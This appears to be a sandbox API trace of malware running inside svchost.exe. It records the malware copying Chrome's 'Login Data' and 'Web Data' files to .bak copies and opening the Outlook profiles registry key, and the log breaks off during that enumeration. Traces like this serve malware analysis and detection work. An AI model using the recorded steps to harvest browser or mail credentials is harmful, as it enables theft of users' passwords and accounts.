	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="SetFileInformationByHandle") returned 0x76b48d0f
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeConditionVariable") returned 0x77389981
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="WakeConditionVariable") returned 0x773d5a7b
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="WakeAllConditionVariable") returned 0x773545a5
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="SleepConditionVariableCS") returned 0x76b418be
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeSRWLock") returned 0x77389981
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="AcquireSRWLockExclusive") returned 0x7738334e
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77361801
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="ReleaseSRWLockExclusive") returned 0x77383324
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="SleepConditionVariableSRW") returned 0x76b423f5
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThreadpoolWork") returned 0x76b489f2
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="SubmitThreadpoolWork") returned 0x773426a9
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="CloseThreadpoolWork") returned 0x77342111
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="CompareStringEx") returned 0x76b6ebc6
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="GetLocaleInfoEx") returned 0x76b453a5
	[0198.923] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringEx") returned 0x76b9f72b
	[0198.923] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x800) returned 0x397b38
	[0198.924] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0198.924] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4f45d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x3901b8
	[0198.924] GetEnvironmentStringsW () returned 0x398340*
	[0198.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1149, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1149
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x47d) returned 0x398c48
	[0198.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1149, lpMultiByteStr=0x398c48, cbMultiByte=1149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1149
	[0198.924] FreeEnvironmentStringsW (penv=0x398340) returned 1
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x84) returned 0x391be0
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1f) returned 0x3974c0
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2e) returned 0x38a3a0
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x31) returned 0x3948f0
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x16) returned 0x390338
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x24) returned 0x389e78
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x390358
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xd) returned 0x38db88
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1d) returned 0x3974e8
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x31) returned 0x394500
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x17) returned 0x390378
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x17) returned 0x390398
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xe) returned 0x38dba0
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x8d) returned 0x391c70
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x3e) returned 0x384870
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1b) returned 0x397510
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x44) returned 0x3861e0
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x12) returned 0x3903b8
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x18) returned 0x3903d8
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1b) returned 0x397538
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1e) returned 0x397560
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x41) returned 0x386230
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x17) returned 0x3903f8
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xf) returned 0x38db70
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x16) returned 0x390418
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2a) returned 0x38a330
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x29) returned 0x38a410
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x390438
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x16) returned 0x390458
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x22) returned 0x389d58
	[0198.924] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x12) returned 0x390478
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x18) returned 0x390498
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x46) returned 0x386280
	[0198.925] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398c48 | out: hHeap=0x370000) returned 1
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8) returned 0x394930
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3976c8
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2) returned 0x391ea8
	[0198.925] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x391ea8 | out: hHeap=0x370000) returned 1
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2) returned 0x391ea8
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8) returned 0x391eb8
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x3904b8
	[0198.925] GetLastError () returned 0x0
	[0198.925] SetLastError (dwErrCode=0x0) 
	[0198.925] GetLastError () returned 0x0
	[0198.925] SetLastError (dwErrCode=0x0) 
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb8) returned 0x398340
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x6a6) returned 0x398400
	[0198.925] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398400 | out: hHeap=0x370000) returned 1
	[0198.925] GetLastError () returned 0x0
	[0198.925] SetLastError (dwErrCode=0x0) 
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x6) returned 0x391d08
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2) returned 0x398418
	[0198.925] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4) returned 0x398428
	[0198.925] GetLastError () returned 0x0
	[0198.925] SetLastError (dwErrCode=0x0) 
	[0198.925] GetLastError () returned 0x0
	[0198.925] SetLastError (dwErrCode=0x0) 
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb8) returned 0x398800
	[0198.926] GetLastError () returned 0x0
	[0198.926] SetLastError (dwErrCode=0x0) 
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x6a6) returned 0x3988c0
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3988c0 | out: hHeap=0x370000) returned 1
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x391d08 | out: hHeap=0x370000) returned 1
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398340 | out: hHeap=0x370000) returned 1
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398428 | out: hHeap=0x370000) returned 1
	[0198.926] GetLastError () returned 0x0
	[0198.926] SetLastError (dwErrCode=0x0) 
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x6) returned 0x398428
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2) returned 0x398438
	[0198.926] GetLastError () returned 0x0
	[0198.926] SetLastError (dwErrCode=0x0) 
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x200) returned 0x3988c0
	[0198.926] GetLastError () returned 0x0
	[0198.926] SetLastError (dwErrCode=0x0) 
	[0198.926] GetLastError () returned 0x0
	[0198.926] SetLastError (dwErrCode=0x0) 
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4) returned 0x398448
	[0198.926] GetLastError () returned 0x0
	[0198.926] SetLastError (dwErrCode=0x0) 
	[0198.926] GetLastError () returned 0x0
	[0198.926] SetLastError (dwErrCode=0x0) 
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb8) returned 0x398340
	[0198.926] GetLastError () returned 0x0
	[0198.926] SetLastError (dwErrCode=0x0) 
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x6a6) returned 0x398ac8
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398ac8 | out: hHeap=0x370000) returned 1
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398428 | out: hHeap=0x370000) returned 1
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398800 | out: hHeap=0x370000) returned 1
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398448 | out: hHeap=0x370000) returned 1
	[0198.926] GetLastError () returned 0x0
	[0198.926] SetLastError (dwErrCode=0x0) 
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x6) returned 0x398448
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398438 | out: hHeap=0x370000) returned 1
	[0198.926] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398418 | out: hHeap=0x370000) returned 1
	[0198.926] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8) returned 0x398418
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x3904d8
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x3848b8
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x38dca8
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x384900
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x38dcc0
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x384948
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x38dcd8
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x384990
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x38dcf0
	[0198.927] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x3849d8
	[0198.927] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1001d1c2, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x22fc5c | out: lpThreadId=0x22fc5c*=0x684) returned 0xe0
	[0198.927] ResetEvent (hEvent=0x8) returned 1
	[0198.927] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0199.811] strncmp (_Str1="dpost", _Str2="dpost", _MaxCount=0x5) returned 0
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2eb) returned 0x398e68
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2f0) returned 0x399160
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2f0) returned 0x399458
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3977e0
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x397808
	[0199.811] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3977e0 | out: hHeap=0x370000) returned 1
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390538
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3977e0
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x397830
	[0199.811] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x397830 | out: hHeap=0x370000) returned 1
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a2c0
	[0199.811] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390538 | out: hHeap=0x370000) returned 1
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x397830
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x397858
	[0199.811] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x397858 | out: hHeap=0x370000) returned 1
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48) returned 0x3862d0
	[0199.811] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a2c0 | out: hHeap=0x370000) returned 1
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x397858
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x397880
	[0199.811] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x397880 | out: hHeap=0x370000) returned 1
	[0199.811] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x399750
	[0199.811] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3862d0 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x397880
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3978a8
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3978a8 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x90) returned 0x3997b8
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399750 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3978a8
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3978d0
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3978d0 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3978d0
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399868
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399868 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xd8) returned 0x39a050
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3997b8 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399868
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399890
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399890 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399890
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3998b8
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3998b8 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3998b8
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3998e0
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3998e0 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x138) returned 0x39a130
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a050 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3998e0
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399908
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399908 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399908
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399930
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399930 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399930
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399958
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399958 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399958
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399980
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399980 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1c8) returned 0x39a270
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a130 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x399980
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3999a8
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3999a8 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3999a8
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3999d0
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3999d0 | out: hHeap=0x370000) returned 1
	[0199.812] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3999d0
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x397808 | out: hHeap=0x370000) returned 1
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399458 | out: hHeap=0x370000) returned 1
	[0199.812] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399160 | out: hHeap=0x370000) returned 1
	[0199.813] ResetEvent (hEvent=0x8) returned 1
	[0199.813] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) 

Thread:
	id = 216
	os_tid = 0x154


Thread:
	id = 217
	os_tid = 0x684

	[0198.928] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x16ef614, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 1
	[0198.931] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a2c0
	[0198.931] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x50) returned 0x394a60
	[0198.931] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a2c0 | out: hHeap=0x370000) returned 1
	[0198.931] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x398e00
	[0198.931] GetFileAttributesA (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data")) returned 0x2020
	[0199.000] CreateFileA (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0199.000] ResetEvent (hEvent=0xc) returned 1
	[0199.000] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0201.054] CloseHandle (hObject=0xffffffff) returned 0
	[0201.055] CopyFileA (lpExistingFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data"), lpNewFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak"), bFailIfExists=0) returned 1
	[0201.061] ResetEvent (hEvent=0xc) returned 1
	[0201.061] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0204.065] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398e00 | out: hHeap=0x370000) returned 1
	[0204.065] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x394a60 | out: hHeap=0x370000) returned 1
	[0204.065] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x16ef614, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 1
	[0204.066] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a2c0
	[0204.066] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x50) returned 0x394a60
	[0204.066] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a2c0 | out: hHeap=0x370000) returned 1
	[0204.066] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x398e00
	[0204.066] GetFileAttributesA (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data")) returned 0x2020
	[0204.068] CreateFileA (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0204.069] ResetEvent (hEvent=0xc) returned 1
	[0204.069] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0207.091] CloseHandle (hObject=0xffffffff) returned 0
	[0207.092] CopyFileA (lpExistingFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data"), lpNewFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak"), bFailIfExists=0) returned 1
	[0207.102] ResetEvent (hEvent=0xc) returned 1
	[0207.102] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0207.107] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398e00 | out: hHeap=0x370000) returned 1
	[0207.107] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x394a60 | out: hHeap=0x370000) returned 1
	[0207.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x10005460, lpParameter=0x3, dwCreationFlags=0x0, lpThreadId=0x16efaf4 | out: lpThreadId=0x16efaf4*=0x788) returned 0xf4
	[0207.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x10005460, lpParameter=0x1, dwCreationFlags=0x0, lpThreadId=0x16efaf4 | out: lpThreadId=0x16efaf4*=0x74c) returned 0xf0
	[0207.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x10005460, lpParameter=0x2, dwCreationFlags=0x0, lpThreadId=0x16efaf4 | out: lpThreadId=0x16efaf4*=0x7d0) returned 0xf8
	[0207.109] WaitForSingleObject (hHandle=0xf4, dwMilliseconds=0xffffffff) returned 0x0
	[0219.666] WaitForSingleObject (hHandle=0xf0, dwMilliseconds=0xffffffff) returned 0x0
	[0219.666] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0
	[0219.666] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39a1e0
	[0219.666] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390538
	[0219.667] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a608
	[0219.667] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390538 | out: hHeap=0x370000) returned 1
	[0219.667] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48) returned 0x3863c0
	[0219.667] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a608 | out: hHeap=0x370000) returned 1
	[0219.667] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b650
	[0219.667] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3863c0 | out: hHeap=0x370000) returned 1
	[0219.667] memchr (_Buf=0x39a1e0, _Val=49, _MaxCount=0x56) returned 0x0
	[0219.667] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x16ef850 | out: phkResult=0x16ef850*=0x104) returned 0x0
	[0219.667] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="0a0d020000000000c000000000000046") returned 0x0
	[0219.667] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a608
	[0219.667] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390538
